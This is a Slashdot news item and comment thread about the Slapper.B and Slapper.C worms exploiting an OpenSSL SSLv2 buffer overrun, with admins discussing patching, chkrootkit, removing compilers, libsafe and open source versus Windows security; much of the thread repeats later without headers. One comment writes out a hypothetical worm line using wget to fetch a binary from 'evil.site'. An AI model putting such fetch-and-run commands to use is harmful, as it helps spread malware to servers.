Posted by
CmdrTaco
on from the random-dune-reference-here dept.
randomErr writes "The worms, Slapper.B and
Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.;)
-- Why bother.
Re:A few hopes...
by
larien
·
· Score: 5, Informative
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
> It would have been preferrable to inform > the OpenSSL people first, wait a month, > then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Re:A few hopes...
by
evilpenguin
·
· Score: 5, Insightful
And any organization doing this sort of test is STILL vulnerable. That's the problem with trying to prove a negative. Just because an intrusion failed this time does not mean that it will next time. Now, I'm not arguing against performing the kind of assessment and audit you are talking about here, but such tests are only part of the process.
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on close or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, becuase system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue is so critical that it should short-circuit regression testing is a difficult art. And what if the production systems doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
use chkrootkit to see if you've gotten it
by
motorsabbath
·
· Score: 5, Informative
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
This is the sort of thing that makes open source (and linux) look amateurish, unprofessional, and insecure.
I wonder how Windows must look then. Yikes!
-- -- Jim
Same mantra applies to Linux and MS sysadmins:
by
bittmann
·
· Score: 5, Informative
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Informative
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated:-).
If you must use a compiler on your web server, FFS run the publically accessible service in a chroot jail!
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 5, Insightful
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated:-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Insightful
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
Prevent compromise. This is done by disabling unnecessary services and keeping your patch levels current, among other things.
Reduce the impact of compromises that do occur. One way to do this is, much as you disable unnecessary services, only keep the software needed for your application on the box.
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
-- .sig: file not found
CERT Advisory
by
Anonymous Coward
·
· Score: 5, Informative
what does it look like?
by
Anonymous Coward
·
· Score: 5, Interesting
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
your friendly neighborhood AC
Re:what does it look like?
by
KMitchell
·
· Score: 5, Informative
You'll get some additional stuff in your access log and potentially error log but the telltale sign that (on a patched system) someone is pinging you for the exploit is something like this in your ssl_error_log:
It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 5, Insightful
The problem is that many (most? all?) the big-name
distros have Apache built with mod_ssl on them. Even
though I would guess that only a tiny percent
of all web servers need SSL. (Admittedly that
tiny percent is very important, as no money
transactions should be going on without security...)
IMHO if you need SSL on a webserver, you should
be forced to go through the download + build +
cert process yourself.
How to test yourself
by
pbur
·
· Score: 5, Informative
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
http://cert.uni-stuttgart.de/advisories/openssl- ss lv2-master/openssl-sslv2-master.c
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
We're not really catching up
by
Anonymous Coward
·
· Score: 5, Insightful
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:We're not really catching up
by
catfood
·
· Score: 5, Insightful
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:The Worm
by
chrysrobyn
·
· Score: 5, Insightful
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
"Wget"ing its source
by
N+Monkey
·
· Score: 5, Interesting
From the article:
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
-- Vintage computer games and RPG books available. Email me if you're interested.
Every time I hear about anohter buffer overflow, I scratch my head and ask, "Why doesn't anybody use libsafe? This is a library which, once installed, protects all processes, regardless whether they have been patched or not.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
-- Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
Slashdot Mirror
... we're starting to catch up with Microsoft in the vital worm-propagation field, where they've been unmatched for years. :-)
Laugh, it's a joke
- sig? who is this sig of which you speak?
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
;)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Why bother.
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
The heat from below can burn your eyes out
I wonder how Windows must look then. Yikes!
-- Jim
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
http://www.cert.org/advisories/CA-2002-27.html
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
your friendly neighborhood AC
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
- ss lv2-master/openssl-sslv2-master.c
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
Vintage computer games and RPG books available. Email me if you're interested.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.